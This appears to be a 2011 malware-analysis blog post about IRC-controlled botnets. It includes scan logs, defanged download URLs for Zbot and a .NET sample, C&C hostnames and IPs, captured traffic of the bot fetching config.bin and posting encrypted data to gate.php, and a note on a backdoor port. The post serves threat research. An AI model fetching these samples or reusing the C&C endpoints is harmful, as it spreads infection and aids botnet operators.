PRRVMSG [N00_FRA_XP_1371..@ : Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.
PRRVMSG [N00_FRA_XP_1371..@ : Sequential Port Scan started on 192.168.1.0:445 with a delay of 5 seconds for 0 minutes using 20 threads.
PRRVMSG [N00_FRA_XP_1371..@ : Sequential Port Scan started on 192.0.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.

So it launches sweep scan and a cgi was executed to check the configuration: 

GET /cgi-bin/p.cgi HTTP/1.1Host: ppppnipponp.r7m.usCache-Control: no-cache
HTTP/1.1 200 OKDate: Tue, 21 Jun 2011 13:09:01 GMTServer: Apache/2.2.3 (CentOS)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8


780<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0//EN”"http://www.w3.org/TR/REC-html40/strict.dtd"><HTML lang=”jp”><HEAD><META http-equiv=”Content-Type” content=”text/html; charset=EUC-JP”><META http-equiv=”Content-Style-Type” content=”text/css”><META http-equiv=”Content-Script-Type” content=”text/javascript”><TITLE lang=”en”>ProxyJudge V2.35</TITLE><LINK rev=”made” title=”PRimaire C. Stallman”      href=”mailto:PRCS@ProxyJudge.VirtualAve.Net”><LINK rev=”made” title=”Ryuji Takei”      href=”mailto:cry@cker.104.net”><LINK rel=”copyright” href=”http://prx4ever.virtualave.net/ps/notice.html.ja”><LINK rel=”index” href=”http://prx4ever.virtualave.net/ps/”><STYLE type=”text/css”><!—A.noborder:link{        color:white;        text-decoration:none;}A.noborder:visited{        color:white;        text-decoration:none;}A.noborder:active{        color:white;        text-decoration:none;}A.noborder:hover{        color:white;        text-decoration:none;}//—></STYLE></HEAD>
<BODY style=”background:URL(./img/splash2.png)” >[<A accesskey=”a” href=”./prxjdg.cgi?ja”>Japanese</A>]<DIV style=”text-align:center”>ProxyJudge V2.35</DIV>
<HR>
<PRE>        REMOTE_HOST=APuteaux-753-1-30-130.w90-44.abo.wanadoo.fr        REMOTE_ADDR=90.44.77.130
 <STRONG style=”color:red”>via</STRONG>  - <STRONG style=”color:red”>HTTP_CACHE_CONTROL=</STRONG>no-cache        HTTP_HOST=ppppnipponp.r7m.us</PRE>
<HR>
<UL><LI>REMOTE_HOST<DL><DT>Result<DD><DT>Comment<DD>Maybe no problem.</DL><BR><LI>HTTP Env. Value<DL><DT>Result<DD>Via a Proxy<DT>Comment<DD> Proxy servers valuable is detected.</DL><BR><LI>AnonyLevel : <STRONG style=”color:blue”>4</STRONG><BR>&nbsp; If it is not slow, it is useful.</UL>
<HR>
<DIV style=”text-align:right”>prxjdg - created by <A accesskey=”r” href=”http://prx4ever.virtualave.net/ps/”>PRX4EVER</A><BR>thanx to Team Cr[y]ackerz</DIV></BODY></HTML>
0

A little summary

  • 3 IRC Connections differents on dl.ka3ek.com,ng.marketallone.com,haaaaaaaa.ishtiben.com. 
  • One IP adress to dl malware by HTTP 31.184.237.97 and 
  • a host check ppppnipponp.r7m.us
Zbot Malware Analysises

I ve download z.exe on a C&C botnet IRC http://www.exposedbotnets.com/2011/06/c0resuirc-botnet-hosted-in-russian.html

The url to download it it’s hxxp://66.7.218.216/~lee/bots/z.exe

This server is hosted by HostDime.com, Inc. in USA

http://www.virustotal.com/file-scan/report.html?id=438b1d7fbc952564559adb2b90e83843af0802fcdc430ae1bcd2f81b401c9870-1307886463

So I ve executed it in my Sandbox because in anubis, i’ve no result.

When I execute the malware, the first activity is to take its configuration. 

hxxp://raidzone.net/config.bin

IP address it’s always the same: 50.28.21.18

hosted Liquid Web, Inc. in USA

And it posted data:

POST /gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

Host: raidzone.net

Content-Length: 274

Connection: Keep-Alive

Cache-Control: no-cache

.Z!..$Hc}..;`T.5…Nk.U…_h..k……xn.H……;f&…..N.z..K0.|………. .~..;…”GXih…a….4.y.G.j1..20…ox.J……7h42.$A…..c~.c..:F3…&….bx.

.h….P….=.9……….s|..8 .pf.x…q!…u.h…$.we.B..R….^..L……….\|7.t.E….

….6.i.n#. Lp2W……

..\H….HTTP/1.1 200 OK

Date: Sun, 12 Jun 2011 14:30:48 GMT

Server: Apache/2.2.3 (CentOS)

X-Powered-By: PHP/5.1.6

Content-Length: 64

Connection: close

Content-Type: text/html; charset=UTF-8

….p.v3…

[…..;4C.|./.vA..I……..w…p…….S._G…..(…

And it connect at the C&C IRC. http://pastebin.com/PUVYHuqr

It create a backdoor at the port 19252.

It has a keep alive mechanism to contact google:

GET /webhp HTTP/1.1

Accept: */*

Connection: Close

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

Host: www.google.com

Cache-Control: no-cache

Cookie: PREF=ID=e4a7ffeb06da8967:U=ce6a9f52c33f081b:FF=0:TM=1307885461:LM=1307886656:S=I2r2fcBYU8-juJ3n; NID=47=dUHgDqsJwqPHUxB3pNwnAhHPBrekF_-zTLWW_RmGo-bJD-CsW62y97xUdth0g3b_emQeC9ha0eVIdTV55nXEzbW9_dapCaKHrGzEKWnGhWa2gaedhH8vwEmJzAPElyrg

HTTP/1.1 200 OK

Date: Sun, 12 Jun 2011 15:30:31 GMT

Expires: -1

Cache-Control: private, max-age=0

Content-Type: text/html; charset=UTF-8

Server: gws

X-XSS-Protection: 1; mode=block

Connection: close

Edit 2011-06-13

Raidzone.net  https://zeustracker.abuse.ch/monitor.php?host=raidzone.net 

So good fishing !

malware on joiadeouro.net

Find on a C&C IRC 

hxxp://joiadeouro.net/images/lomed.exe develop in .NET

with a bad dectection http://www.virustotal.com/file-scan/report.html?id=378ed6915b68dcd9993b14fac673f4fa182cab8efd8b96fed7b83f844241c587-1307396523

0/43.